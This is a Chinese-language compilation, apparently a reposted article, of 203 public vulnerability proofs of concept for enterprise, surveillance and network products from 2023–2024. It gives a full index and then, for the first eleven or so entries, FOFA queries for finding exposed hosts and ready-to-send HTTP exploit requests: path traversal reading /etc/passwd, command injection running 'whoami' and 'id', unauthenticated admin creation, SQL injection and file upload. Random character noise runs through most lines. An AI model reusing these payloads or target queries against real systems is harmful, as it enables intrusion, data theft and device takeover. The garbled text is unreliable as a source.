互联网公开漏洞整理202309-2024060 L" F7 b7 n) R6 Q N/ H% y @1 A
道一安全 2024-06-05 07:41 北京( K9 Q! j9 i4 b% R% n
以下文章来源于网络安全新视界 ,作者网络安全新视界4 O* n# A# w! ~3 l! W q
2 ^/ j5 ]. z9 `/ |+ `
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
. m9 B; L8 T& o! f3 K+ {9 P% K7 o
, W5 s7 Y# H9 Z# B漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。. M' M4 [* l1 C' F
+ ?2 w5 z" ^& M% ]4 M
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
4 }0 T V0 d U! t. n- E2 ^! d0 v H G( u' ] {. B+ f5 Q
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
) C- `+ Y; b$ J" c
* x( g0 e2 X9 Z# Z合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
; L4 G9 Q( u7 |: \2 w# u9 I( @' {2 F! f, i2 R) C4 S
& f2 G. |. K1 E: A6 R+ G8 U/ m
声明6 D2 w# ~. B7 A; M& d
4 g& M( i7 C9 s j2 O
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
$ `5 P0 ~6 v+ j; e" w+ ]
- G9 j* u X+ K# v& x8 h' ^4 |0 T有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
: Y- Z' W0 `; m8 f$ N
% ?( ~+ A. Z: r$ q4 Q6 _2 r5 M, F/ Q
1 `+ o% K' f* N! J k0 Z! H# ^9 G! [目录$ v; w8 b- b) T4 ^ g8 K! l3 A
5 Y2 T7 J0 o# u+ m
01
" a0 Z- ^( N/ r; s8 i" L7 d, R( W: m% f, j3 U+ n7 `( X: A
1. StarRocks MPP数据库未授权访问
6 R. H# N( D+ y# u2. Casdoor系统static任意文件读取
- O( P- B- c& ~+ X3. EasyCVR智能边缘网关 userlist 信息泄漏
7 E7 Z; W& c, E- J& O) x& H4. EasyCVR视频管理平台存在任意用户添加
* |: A# P' L- w5. NUUO NVR 视频存储管理设备远程命令执行
) L' W' ?' F: R! ^0 v6. 深信服 NGAF 任意文件读取
$ E8 z, h/ g& x7. 鸿运主动安全监控云平台任意文件下载
' M) W" r+ i$ @ l8. 斐讯 Phicomm 路由器RCE
1 B; D+ T! ?1 D) w9. 稻壳CMS keyword 未授权SQL注入& {0 \' W- g2 w6 M4 {
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传 K7 Z. Z% c6 S1 G6 b5 t
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: Z; k- ?4 D: m/ Y B0 V6 b- J# I
12. Jorani < 1.0.2 远程命令执行: v, S9 P/ ~ l: U/ ?
13. 红帆iOffice ioFileDown任意文件读取+ M* @5 f. _# X! |% K
14. 华夏ERP(jshERP)敏感信息泄露
& `$ ~# @( u/ `1 S: k15. 华夏ERP getAllList信息泄露* i8 q+ {5 t+ |1 k0 W q8 p0 B7 s* R
16. 红帆HFOffice医微云SQL注入
: c, y: W: \# a$ s: {, J) W7 R$ M2 Z17. 大华 DSS itcBulletin SQL 注入; t. u) M' E. }% F3 S* X
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
. n$ L" O8 s" d+ G" R1 A19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
6 ?/ T9 U$ }$ u5 K0 Q# c' G7 c4 @20. 大华ICC智能物联综合管理平台任意文件读取
# p/ h4 _, O) K& U21. 大华ICC智能物联综合管理平台random远程代码执行; ]: e8 H% s2 G, P8 d% B6 _7 _+ n2 I
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
( K- h; S B+ L( I, ^' e23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
+ ]; d5 U# [* u2 V2 [0 O2 d0 P24. 用友NC 6.5 accept.jsp任意文件上传
: u# J1 r9 l7 Z! j3 R, g25. 用友NC registerServlet JNDI 远程代码执行7 v- J' H$ o* @# u
26. 用友NC linkVoucher SQL注入
. T; C. ?' M" k) j! e1 r# ?27. 用友 NC showcontent SQL注入8 k* z3 M7 g* l: @% @
28. 用友NC grouptemplet 任意文件上传( O8 y% p, o' Q6 A
29. 用友NC down/bill SQL注入1 l9 K" {6 O. r: H/ f2 D8 [
30. 用友NC importPml SQL注入- |" |! n; G; R P) i
31. 用友NC runStateServlet SQL注入
`3 E5 m7 w# i0 H4 D0 X+ T4 ]32. 用友NC complainbilldetail SQL注入. A8 J$ m Q% p$ z7 w4 A, w
33. 用友NC downTax/download SQL注入
( e# m/ ?4 c: L5 k34. 用友NC warningDetailInfo接口SQL注入. W% L5 C4 h6 x# c, o
35. 用友NC-Cloud importhttpscer任意文件上传
( e9 z% G0 i6 z7 Q, X2 V7 Y36. 用友NC-Cloud soapFormat XXE
7 q3 S( F: R; m37. 用友NC-Cloud IUpdateService XXE, ^& T2 y2 R8 T( {
38. 用友U8 Cloud smartweb2.RPC.d XXE
* ?/ Q/ V5 j# H* g6 ^7 {) h39. 用友U8 Cloud RegisterServlet SQL注入
" _! m! v7 w4 S6 S+ f$ E$ v$ X40. 用友U8-Cloud XChangeServlet XXE; A% e g; ~+ g9 w6 L* C
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入0 D* {6 u8 v) F, i* `2 c5 C
42. 用友GRP-U8 SmartUpload01 文件上传
4 E5 m2 M3 X; D, S6 @43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 S9 ]- K& {- R; D( r7 L4 [
44. 用友GRP-U8 bx_dj_check.jsp SQL注入8 J: p0 S5 Y3 J6 I2 @
45. 用友GRP-U8 ufgovbank XXE
2 ] A' r) C5 w+ T46. 用友GRP-U8 sqcxIndex.jsp SQL注入
+ {5 a+ \ U. d47. 用友GRP A++Cloud 政府财务云 任意文件读取
* w# e Z Y4 E1 b, y48. 用友U8 CRM swfupload 任意文件上传0 t, c/ S6 I( n0 M
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
& z5 y4 H( T; {" b* u* U2 i50. QDocs Smart School 6.4.1 filterRecords SQL注入
$ t- w$ S* U$ _, \/ V5 A51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
1 ^" d' o% ^! H$ p52. 泛微E-Office json_common.php sql注入1 X F1 Q! ^* g+ g
53. 迪普 DPTech VPN Service 任意文件上传$ u; @! A1 M' [* h$ u
54. 畅捷通T+ getstorewarehousebystore 远程代码执行, o, _4 s0 L* w
55. 畅捷通T+ getdecallusers信息泄露" `! K% x( o) T6 k& f
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
, J' K7 I( d3 D; ]6 b8 Y' F* k57. 畅捷通T+ keyEdit.aspx SQL注入. M! }. X* t1 B1 {/ {& G
58. 畅捷通T+ KeyInfoList.aspx sql注入/ K6 G) i' \5 X; _- `9 w! D7 q
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 J% e9 O" q* T% T. S& f9 a60. 百卓Smart管理平台 importexport.php SQL注入2 r8 e- d$ c8 a" y! s0 o. U# @
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传# ~8 p+ ]+ R7 W9 X8 I* T
62. IP-guard WebServer 远程命令执行5 K4 V( Y Q; r/ f6 @
63. IP-guard WebServer任意文件读取0 B! I* @; X4 g
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
, l0 p3 ~, G! }: P& V65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过8 X2 C9 m, r6 q0 E$ l" ~$ E
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入; s/ z- j6 P @4 K
67. 万户ezOFFICE wpsservlet任意文件上传
1 k9 i1 u, P* K68. 万户ezOFFICE wf_printnum.jsp SQL注入. L) f7 N: v1 D7 R5 q4 K
69. 万户 ezOFFICE contract_gd.jsp SQL注入
" o0 m- y! A8 y+ a* ~70. 万户ezEIP success 命令执行
g) _% F5 k# D; o1 f$ q71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入1 N: l5 f0 ~. I6 K8 p, U2 P
72. 致远OA getAjaxDataServlet XXE
1 |- K2 M9 E1 M2 N8 L1 N73. GeoServer wms远程代码执行, p$ o; Z0 e# y3 B, F% n
74. 致远M3-server 6_1sp1 反序列化RCE
5 _9 R4 ?! K. i& U/ d" ~75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
& ~7 k3 r: A- ?, D1 g2 e76. 新开普掌上校园服务管理平台service.action远程命令执行
* a3 w: t! c" S, ~77. F22服装管理软件系统UploadHandler.ashx任意文件上传5 p" Y; c6 c. s1 i3 K& P) ^$ E) {
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传" z& ]- u+ R. o* ^" q) s
79. BYTEVALUE 百为流控路由器远程命令执行& d" a) H/ _+ r; R0 j7 G
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
( L: h5 I. Z% n" R4 I7 T' l81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
" o0 i/ H% X; A82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行1 s* C \( j3 E# B- h& L) y8 ?
83. JeecgBoot testConnection 远程命令执行: A" V8 R* C% v; s3 L
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入8 n% H W+ h5 K4 j0 P% q
85. SysAid On-premise< 23.3.36远程代码执行0 u, r4 Y; P) V, H
86. 日本tosei自助洗衣机RCE
" i" Q2 q7 ~$ r, {9 R5 P: [, K87. 安恒明御安全网关aaa_local_web_preview文件上传
$ D0 Q' A2 W7 q# C/ [" i# ]88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
* k/ e7 V Q8 E89. 致远互联FE协作办公平台editflow_manager存在sql注入
, t, ]+ e0 O- S- c% Y6 V90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
5 X+ n+ l( L4 W4 ^0 Z- q( G( p91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
4 U' ?" U! ^4 D" I2 g. m# `92. 海康威视运行管理中心session命令执行
2 s2 `5 u0 l# B% {* J: c$ ^2 A93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
) y) r0 U4 o& [3 |5 T7 D94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
0 A6 p/ G- e& P, J/ a95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行! W7 v5 \# i: Q
96. Apache OFBiz 18.12.11 groovy 远程代码执行
4 `' r/ L4 I7 p3 Y+ b+ D97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 J' T7 ~, A. g* ^1 X D( h. [98. SpiderFlow爬虫平台远程命令执行
) J( {9 V$ t: b# y u99. Ncast盈可视高清智能录播系统busiFacade RCE
& `8 \, B8 u7 ^" A100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传8 }4 e% f5 l7 O3 \" r
101. ivanti policy secure-22.6命令注入5 s' X1 { j8 V, R
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行9 o. q% F# U$ @' k: S
103. Ivanti Pulse Connect Secure VPN XXE
1 `; P9 h( n1 B: k104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
5 {- q, d8 h- Q9 _# f6 N105. SpringBlade v3.2.0 export-user SQL 注入
6 f4 T7 C( T1 D) t1 `6 s6 c& U106. SpringBlade dict-biz/list SQL 注入' W2 Z2 V* v% Z0 i( b3 _# a
107. SpringBlade tenant/list SQL 注入
+ ?+ T1 l+ y$ M: W1 j6 u( L108. D-Tale 3.9.0 SSRF! K; o: G$ \& I
109. Jenkins CLI 任意文件读取* `/ C Y) \" w) N! @0 d8 {
110. Goanywhere MFT 未授权创建管理员 C6 |( G3 A$ h& ^( u2 ]4 {; g
111. WordPress Plugin HTML5 Video Player SQL注入 D9 O) z/ \5 P1 p6 R, f
112. WordPress Plugin NotificationX SQL 注入
( {5 z7 u5 W3 F113. WordPress Automatic 插件任意文件下载和SSRF
5 R6 t) S# }5 L R: J& J114. WordPress MasterStudy LMS插件 SQL注入- n0 d0 k0 @+ v" y# h6 f
115. WordPress Bricks Builder <= 1.9.6 RCE
; F* o% z0 V+ l) F5 ?% ^2 L116. wordpress js-support-ticket文件上传; k7 C! _. A& y1 x: r
117. WordPress LayerSlider插件SQL注入) h' {' C# H7 {2 [* n1 L
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
2 ]' m7 ` O( t8 u C119. 北京百绰智能S20后台sysmanageajax.php sql注入. F- e% w6 |4 Z2 d
120. 北京百绰智能S40管理平台导入web.php任意文件上传9 \; _1 c' |2 v4 u/ ^
121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 `. ?- i L( @( I6 J
122. 北京百绰智能s200管理平台/importexport.php sql注入; D/ K9 g$ y" g: E6 Y4 p; g
123. Atlassian Confluence 模板注入代码执行
9 {$ i9 o# C7 i" w# X' e* q7 {9 ]) \124. 湖南建研工程质量检测系统任意文件上传
, I2 q v* [1 { ]& j+ F- z. H- U z125. ConnectWise ScreenConnect身份验证绕过+ Y- O+ H# ]; `( r9 W+ l$ D
126. Aiohttp 路径遍历- @0 b4 d2 E8 T# ^! t
127. 广联达Linkworks DataExchange.ashx XXE, j* L0 L8 W; {7 i* o# ~. `
128. Adobe ColdFusion 反序列化- g" z# R9 r' }( _8 R
129. Adobe ColdFusion 任意文件读取
h! L7 \5 \5 A# I8 N) j130. Laykefu客服系统任意文件上传
+ h' B K# k1 [131. Mini-Tmall <=20231017 SQL注入
8 G* h5 h5 ?+ E" q. E1 p8 R* a132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, `% x$ e. k/ p2 v0 ~/ _7 y% K
133. H5 云商城 file.php 文件上传& Q% r5 p/ b+ P3 g* {
134. 网康NS-ASG应用安全网关index.php sql注入9 N1 i$ M; T0 U& ?
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* D! V% b6 p7 d
136. NextChat cors SSRF. Y9 {7 [! b) C4 c. F5 G9 ^
137. 福建科立迅通信指挥调度平台down_file.php sql注入
7 l% z5 _8 I# T, v3 T5 s138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
* C; c/ {& b1 M% L# q139. 福建科立讯通信指挥调度平台editemedia.php sql注入
0 M' R" k0 X) B' j; x8 S" W% g140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
* ~! F6 G4 E5 A2 n3 }/ s( h1 L141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
: K+ p) o6 y" l3 j" B7 K7 a142. CMSV6车辆监控平台系统中存在弱密码7 z2 |4 K6 o9 A+ C. H
143. Netis WF2780 v2.1.40144 远程命令执行
# E8 X. w8 |/ x: o2 p2 q$ \! J8 e/ r144. D-Link nas_sharing.cgi 命令注入
: ?' M9 a' o( R' m' n9 S145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
8 K5 ^3 s3 W2 K146. MajorDoMo thumb.php 未授权远程代码执行
' M: A9 K+ N+ b6 ^+ s147. RaidenMAILD邮件服务器v.4.9.4-路径遍历: H8 ? L% H" J
148. CrushFTP 认证绕过模板注入
# ^ L6 ?. Y, [4 J( J" \149. AJ-Report开源数据大屏存在远程命令执行* e7 p* L( u9 {# W2 l! u$ C( B
150. AJ-Report 1.4.0 认证绕过与远程代码执行
# l$ v. t2 ^6 d3 r5 W$ L0 z2 X- I151. AJ-Report 1.4.1 pageList sql注入% O. J w. T2 j, W W. {
152. Progress Kemp LoadMaster 远程命令执行
- ^! @4 E7 x* g$ G' ^' }; c153. gradio任意文件读取
3 Q; ?/ K- U2 s! i+ m4 @' D154. 天维尔消防救援作战调度平台 SQL注入) t$ ~* M9 k/ ~4 z" w( D8 I8 r+ ]
155. 六零导航页 file.php 任意文件上传
1 V' U& Q- H& k! X156. TBK DVR-4104/DVR-4216 操作系统命令注入
8 T; I: f' B3 L157. 美特CRM upload.jsp 任意文件上传( L* C' \7 K) k( k9 v
158. Mura-CMS-processAsyncObject存在SQL注入 z/ O1 ?# c9 B1 \4 k( Y$ X5 U
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传! h) f: g/ X8 X+ Q0 X( R1 J4 G
160. Sonatype Nexus Repository 3目录遍历与文件读取: h* \* c8 [; X4 R( [
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
4 O* r4 X* ?- \0 Z, p4 J162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
# h3 p4 l. t2 D) F3 G163. 号卡极团分销管理系统 ue_serve.php 任意文件上传6 {. p: ~: k2 P: K- [+ a# c
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传% P1 w- i' ]6 \
165. OrangeHRM 3.3.3 SQL 注入
: f5 o/ a5 L1 G' ~7 z- d7 s% K166. 中成科信票务管理平台SeatMapHandler SQL注入. C$ r2 W7 s/ z4 }3 X+ q- w5 ^, [
167. 精益价值管理系统 DownLoad.aspx任意文件读取# w3 w# Z- p- [4 O
168. 宏景EHR OutputCode 任意文件读取% V! h+ x$ e" D$ ?* x$ z
169. 宏景EHR downlawbase SQL注入, B$ E$ y; N4 {( h
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
' d4 t, B* O& V& Q3 o171. 通天星CMSV6车载定位监控平台 SQL注入+ f4 v8 M$ E3 x/ q# Z# Z
172. DT-高清车牌识别摄像机任意文件读取! k& h/ `1 g9 |4 a/ F, z9 m5 u/ t7 w
173. Check Point 安全网关任意文件读取" F2 I, b5 F/ w4 `3 [& L: A
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 Z# z4 X% f" j ]175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入% g# a% E4 ^ J$ m- g4 Q. D
176. 电信网关配置管理系统 rewrite.php 文件上传3 `9 a! p- s5 j' K6 \
177. H3C路由器敏感信息泄露 ~" u0 i3 g& o# a9 c" q. h
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
, u1 u" q) r( `& B7 j( {& \+ G179. 建文工程管理系统存在任意文件读取& }9 ]/ i% W* H) t6 }( ~( X
180. 帮管客 CRM jiliyu SQL注入
% J) P7 H3 K) {5 u1 T5 ]7 a% j) x181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
8 y$ a8 l' P5 {6 p3 E- r6 V182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建" U! e: p/ k5 F, G
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
6 p$ d: [; R( o/ @+ O184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
0 [! P$ o3 c9 `5 ~; c185. 瑞友天翼应用虚拟化系统SQL注入
2 \2 r7 L+ e/ q2 o. M! w0 b186. F-logic DataCube3 SQL注入
6 V! w# u# J7 b9 _* l% m1 b187. Mura CMS processAsyncObject SQL注入
5 ?' V. j& Z" c$ u+ X; [ Q188. 叁体-佳会视频会议 attachment 任意文件读取
' |; K7 E# O- n: z189. 蓝网科技临床浏览系统 deleteStudy SQL注入) G. l1 X; U7 ?# _
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
' S! I' z/ P; e+ H; }% q& U191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入2 |% n# B4 Y" g) \8 L
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传& F5 e1 Z L7 A# Q0 ~
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
. W0 r" ^* a4 c* w! V6 R194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传/ ~& r! ^7 {- B1 h* C! n4 _) L
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
7 W) F% U N1 G: m196. 河南省风速科技统一认证平台密码重置 e( r8 V6 _4 m
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
/ u! p" X$ D3 l' o198. 阿里云盘 WebDAV 命令注入9 D7 _0 n9 Q2 A' |( @, C& n
199. cockpit系统assetsmanager_upload接口 文件上传
5 P, f1 L/ U+ D; [# U1 c* Q% U200. SeaCMS海洋影视管理系统dmku SQL注入- c" \8 }1 r( B
201. 方正全媒体新闻采编系统 binary SQL注入
# Q8 Q- B' ]% z% \9 @ [, H% i3 S202. 微擎系统 AccountEdit任意文件上传1 q8 O) {+ Q6 k
203. 红海云EHR PtFjk 文件上传9 X) s2 O$ D7 r6 d* R/ H
* Z7 n. R5 T/ u6 Z# w& xPOC列表* _6 { @9 H, q( b+ P% R8 p
8 x$ K8 k: l. \7 p02
1 {7 r: y2 ~+ X J8 x8 ]2 g
. h( i- y6 H( Y/ w1. StarRocks MPP数据库未授权访问! z$ [4 @) E# x. v% t
FOFA :title="StarRocks"0 x* u7 H! x3 G4 R* U$ J
GET /mem_tracker HTTP/1.1/ t- ~0 V2 _# {2 G# v' r$ [7 M% R
Host: URL
+ p9 O1 r' p9 Q' a$ |7 P# M _9 L: h5 a; N5 S% a
. _2 \2 l3 w1 E" j# F7 k
2. Casdoor系统static任意文件读取
8 B" V% ^/ ] a. w! j' QFOFA :title="Casdoor"
* ?- ?+ F. U" f( C' ?GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
' l* @2 E. A/ }) WHost: xx.xx.xx.xx:9999
5 y1 ]. I7 f: q1 Z" \: QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& X- D) R% x- }, W# U' RConnection: close% i8 Q1 M; Y% j8 D# h
Accept: */*4 k# G$ ]* I; a8 b$ \/ ]
Accept-Language: en0 @1 p! C, E* H* X
Accept-Encoding: gzip3 u) a" Z; K8 P9 V4 e2 `
; s l" \0 N6 d3 w5 i
9 W* p$ |, p" [" o
3. EasyCVR智能边缘网关 userlist 信息泄漏
6 u: D) N5 p- o) I5 G; _FOFA :title="EasyCVR"2 ^$ s$ H! n @% f$ |; T: J
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1) q' x* L4 X1 L Q
Host: xx.xx.xx.xx
( n* e8 I/ |5 y3 g* W1 r( k* ^/ f) h* F
9 u4 |$ f4 T; Z5 G
4. EasyCVR视频管理平台存在任意用户添加
/ q) v1 h$ [% _8 x; x6 U# | h& H- mFOFA :title="EasyCVR"
8 ]) x5 Y7 F. ~( X3 X; ?4 }9 y3 q
/ c- w, B. D) ]7 S8 r6 Wpassword更改为自己的密码md5% H+ M/ G" V! s2 [ j7 A
POST /api/v1/adduser HTTP/1.1# H( ?) m; L% m% K6 c
Host: your-ip0 R5 X' Z% u+ {; y
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 W* Z' O- }( F* u1 C3 h9 I; j6 v8 [& B. B
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
$ i+ r. O5 C7 J1 a9 B. h
|0 p" E5 H" k$ v: J# m
! t' Y5 @) z- |5. NUUO NVR 视频存储管理设备远程命令执行7 z% i! H/ S6 Y" m+ u% ^7 D6 i
FOFA:title="Network Video Recorder Login"
* z( t: {0 Y* W: F% ZGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
9 V; S, T0 F+ X; lHost: xx.xx.xx.xx* I) L, }- ^9 s
0 w. a% d! V7 |: T. z& }$ a' Q2 x
6 G2 @; W3 G6 s! a
6. 深信服 NGAF 任意文件读取4 D( H& G: f- M0 W
FOFA:title="SANGFOR | NGAF"
; }2 V# ~: B) n" K" \. B& v7 D3 \GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.17 F/ C3 c) R) `. C! _ F) s
Host:
# C+ R B7 ^/ W3 ~- Y
0 J' v6 G; v% p* M! s: F
4 @5 T& C( c; O O+ ?* N4 D, v, g2 i7. 鸿运主动安全监控云平台任意文件下载
& {' g9 |3 o, I( s( W" P; A6 T7 u7 tFOFA:body="./open/webApi.html"
. c% j6 K% r# wGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1. b7 A5 L$ n L2 j5 h
Host:
% k6 F( K- w/ a, b& Z
9 }9 o, E. ]- x7 H8 o: B# ]# f0 v" T2 T* {4 x+ q5 L
8. 斐讯 Phicomm 路由器RCE/ o3 C H) J- {! i% C. Y
FOFA:icon_hash="-1344736688"2 |6 [/ r$ Z, N6 _. H4 T7 z
默认账号admin登录后台后,执行操作
2 E6 D9 Q0 `, {POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ U& \* s4 P7 l% FHost: x.x.x.x$ c) ?* K& M7 z. F }2 S
Cookie: sysauth=第一步登录获取的cookie
9 v$ o% m* W! e3 f; K: uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz7 |% e8 \9 O) Q3 k6 O; h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 g. ?/ K; _9 R2 d+ M! \9 h; }# M" D4 B% _) t
------WebKitFormBoundaryxbgjoytz
9 Y/ P, D W. |! |0 \Content-Disposition: form-data; name="wifiRebootEnablestatus"1 I+ _% Q, ] C1 P
5 H- k4 h2 J3 H* S%s9 [7 e2 z2 Y! B/ V( v% e
------WebKitFormBoundaryxbgjoytz! c. C; t5 g" G
Content-Disposition: form-data; name="wifiRebootrange"- [6 Z, N# w- m% `7 Y5 s5 @
( C& S! M# I! `& W' J4 E/ b; y12:00; id;
) w# w/ S/ s2 R; Y& N------WebKitFormBoundaryxbgjoytz
( I* o. m. G# w, U. wContent-Disposition: form-data; name="wifiRebootendrange"
; z @* Q% O- [) r; ~; a
, q) Z2 [$ @: H9 y4 [4 e%s:# A5 P& m; t* g. _* e
------WebKitFormBoundaryxbgjoytz
6 ]4 H* N% f. I8 E5 |/ AContent-Disposition: form-data; name="cururl2"
! U1 @7 S3 y/ \1 a# U0 |) ?" q7 z- y: `9 r1 f# \. y. ?5 H
}( m2 ]9 i3 I- q: ^------WebKitFormBoundaryxbgjoytz--5 D- t+ a$ ^: Q3 M
% ?9 F6 a; p6 W9 `& N
" H6 U+ |, g* l: N) O
9. 稻壳CMS keyword 未授权SQL注入( ?5 L3 Z5 l, H! A2 {" w
FOFA:app="Doccms"- o$ D7 c; x1 y( N4 _ F3 D! ]! J. V% [
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
1 t5 _6 ]5 i9 c6 a1 q! z3 g( v9 z( nHost: x.x.x.x: u3 Q6 F' d Q5 @0 ~
& M' ?" q* ^0 v e/ {& c- m8 C
0 E* Z m- m( r% S& W1 Jpayload为下列语句的二次Url编码
; F- ~" H" @( n3 S0 j: H
9 B: j4 @& g+ ~; k4 ]6 L8 o3 T' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
6 L+ Z7 _! q/ u. d8 A$ S0 F% E: \ h. q9 P1 L( ?
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
, n' D* r Q9 N5 l( X% w0 G# cFOFA:icon_hash="953405444"( ]9 O0 }/ Q R6 w" i
! v' I0 G: R! y) i0 P4 ]
文件上传后响应中包含上传文件的路径7 H! u/ k! |/ [& o# j/ W2 V7 c
POST /eis/service/api.aspx?action=saveImg HTTP/1.1- s s) w: r3 K: o
Host: x.x.x.x:xx1 `. b+ t! L5 ~( T# g: J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36( u2 g3 H$ y4 c* `* s: H
Content-Length: 197
/ \2 X( [, _) O3 |- [9 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 q) a* I, J/ C" D
Accept-Encoding: gzip, deflate
& o5 u9 s9 X- y$ t0 c# QAccept-Language: zh-CN,zh;q=0.9
( I9 ^7 R. S2 s3 rConnection: close
$ ?0 R( ~& i9 y% U$ C2 D. aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
& v3 W/ w1 j ]
- T9 F+ D4 b( g8 d------WebKitFormBoundaryxdgaqmqu
3 L! ^/ ^. m* z! Y* ?, J6 JContent-Disposition: form-data; name="file"filename="icfitnya.txt"
3 h1 n+ T8 q2 H( t( EContent-Type: text/html
( k$ a5 O/ ?9 u; z( k
) v" ?9 m4 _& G8 O& |2 i3 vjmnqjfdsupxgfidopeixbgsxbf
& t2 m. r) M/ V6 y( D6 @$ ~; {------WebKitFormBoundaryxdgaqmqu--
! P6 x2 O7 g5 R+ ~9 z) T
7 p& ^6 ~. g, {3 R7 I# t* d( r9 _8 i. M8 U) ~
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入0 h$ H, `- F8 A) a( j! z4 `$ }
